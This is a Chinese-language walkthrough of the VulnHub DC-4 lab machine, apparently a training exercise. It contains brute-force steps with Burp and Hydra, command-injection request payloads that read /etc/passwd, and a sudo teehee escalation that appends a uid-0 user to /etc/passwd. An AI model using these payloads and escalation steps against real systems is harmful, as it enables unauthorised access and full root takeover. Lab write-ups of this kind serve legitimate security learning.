靶机地址
dc4链接:https://www.vulnhub.com/entry/dc-4,313/
打开靶机,设置为同一种nat模式
kali 信息收集主机发现
arp-scan -l
扫描ip端口,开放80,22端口访问网址
burp 抓取数据包,进行爆破采用cluster bomb模块,添加字典1和字典2 账号密码(admin happy)
点击command,发现三条命令
burp抓包修改命令
radio=cat+/etc/passwd&submit=Run
发现三个用户,在charles用户下没有看到有用信息,切换到jim用户查看
radio=ls+-al+/home/jim&submit=Run
查看back目录下有old-passwords.bak
查看old-passwords.bak
利用hydra对三个用户进行ssh爆破,将三个用户名写入users.txt,密码写入passwd.txt
ssh登录jim账号
查看邮件,在cd /var/mail
如图可以知道Charles密码,切换用户,使用teehee命令
利用mkpasswd来生成密码
使用teehee来添加一个管理员用户到passwd文件里
sudo teehee -a /etc/passwd
test:$6$oBLtCRtnRR5VK/G6$.fgFjk6qyj2nO/Cc/V54BD64KTGP3gGUbn3fYCO3aR7vP749qAwK42yKouue05pahfBJey44JKqA..bIy32P0.:0:0:/root/root:/bin/bash
查看文件/etc/passwd
切换用户test
在cd /root/flag.txt
teehee命令解释
teehee是个小众的linux编辑器。如果有sudo权限。可以利用其来提权
linux中普通用户能临时使用root权限的命令,查看方式:
sudo -l
核心思路就是利用其在passwd文件中追加一条uid为0的用户条目
echo "raaj::0:0:::/bin/bash" | sudo teehee -a /etc/passwd
按照linux用户机制,如果没有shadow条目,且passwd用户密码条目为空的时候,可以本地直接su空密码登录。所以只需要执行su raaj就可以登录到raaj用户,这个用户因为uid为0,所以也是root权限。
参考链接
https://blog.csdn.net/m0_62008601/article/details/124686217